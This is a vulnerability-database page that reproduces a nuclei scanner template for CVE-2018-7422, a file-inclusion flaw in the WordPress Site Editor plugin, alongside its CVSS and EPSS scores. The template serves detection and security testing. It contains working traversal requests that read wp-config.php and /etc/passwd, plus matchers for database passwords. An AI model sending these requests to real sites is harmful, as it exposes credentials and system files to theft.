Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7422
HistoryApr 11, 2021 - 10:19 a.m.

WordPress Site Editor <=1.1.1 - Local File Inclusion

2021-04-1110:19:26
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.947 High

EPSS

Percentile

99.3%

WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
id: CVE-2018-7422

info:
  name: WordPress Site Editor <=1.1.1 - Local File Inclusion
  author: LuskaBol,0x240x23elu
  severity: high
  description: |
    WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the system.
  remediation: |
    Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44340
    - http://seclists.org/fulldisclosure/2018/Mar/40
    - https://wpvulndb.com/vulnerabilities/9044
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7422
    - https://github.com/El-Palomo/SYMFONOS
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7422
    cwe-id: CWE-22
    epss-score: 0.94711
    epss-percentile: 0.99255
    cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: siteeditor
    product: site_editor
    framework: wordpress
  tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
      - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100d130ae4cb695a939a7a148ce741cb735003593334f98ecdb200b1ed63ce06d40022100c748611fd920ad420a8da6b17e7dfed8b6e1f64236b1e81b77129ea771faa24e:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.947 High

EPSS

Percentile

99.3%